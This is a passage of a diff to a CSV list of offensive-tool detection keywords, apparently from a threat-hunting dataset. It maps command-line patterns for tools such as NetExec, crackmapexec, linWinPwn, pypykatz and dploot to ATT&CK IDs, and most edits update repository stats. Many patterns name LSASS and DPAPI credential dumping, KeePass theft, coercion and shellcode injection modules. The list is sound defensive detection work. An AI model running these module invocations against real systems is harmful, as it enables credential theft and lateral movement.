*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" 
@@ -1193,79 +1193,79 @@ "* lsass.dmp*","offensive_tool_keyword","AD exploitation cheat sheet","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* lsass_creds.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* lsassy -k -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* lsassy*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"* lsassy*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" "* lu-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -M dfscoerce *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M empire_exec -o LISTENER=http-listener*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -M gpp_autologin*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -M handlekatz *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M keepass_discover *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M keepass_discover*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -M keepass_trigger -o ACTION=ALL USER=*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"* -M dfscoerce *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M empire_exec -o LISTENER=http-listener*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate 
assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M gpp_autologin*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M handlekatz *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M keepass_discover *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M keepass_discover*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M keepass_trigger -o 
ACTION=ALL USER=*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "* -m lagentcmd *powershell *","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z" -"* -M laps --kdcHost *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M ldap-checker *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M ldap-checker *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -M lsassy *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M MAQ --kdcHost *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M masky *CA=*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M ms17-010 *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M mssql_priv *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory 
Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M multirdp*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -M nanodump *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M laps --kdcHost *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M ldap-checker 
*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M ldap-checker *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M lsassy *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M MAQ --kdcHost *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M masky *CA=*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M ms17-010 *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M mssql_priv *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M multirdp*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -M nanodump *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "* -m olecmd -o *powershell *","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z" -"* -M pe_inject*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -M petitpotam *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M petitpotam*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -M printnightmare *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -m privileged-users --full *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability 
checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M procdump ","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M pe_inject*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -M petitpotam *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M petitpotam*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool 
that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M printnightmare *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -m privileged-users --full *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M procdump ","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "* -m rdrleakdiag -M masterkeys*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" -"* -m run_command -c 
*.exe*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"* -M runasppl *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M scuffy -o SERVER=127.0.0.1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -M scuffy*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -M shadowcoerce *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M shadowcoerce*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -M shellcode_inject*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -M slinky","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -M slinky -o SERVER=*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -M spider_plus *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network 
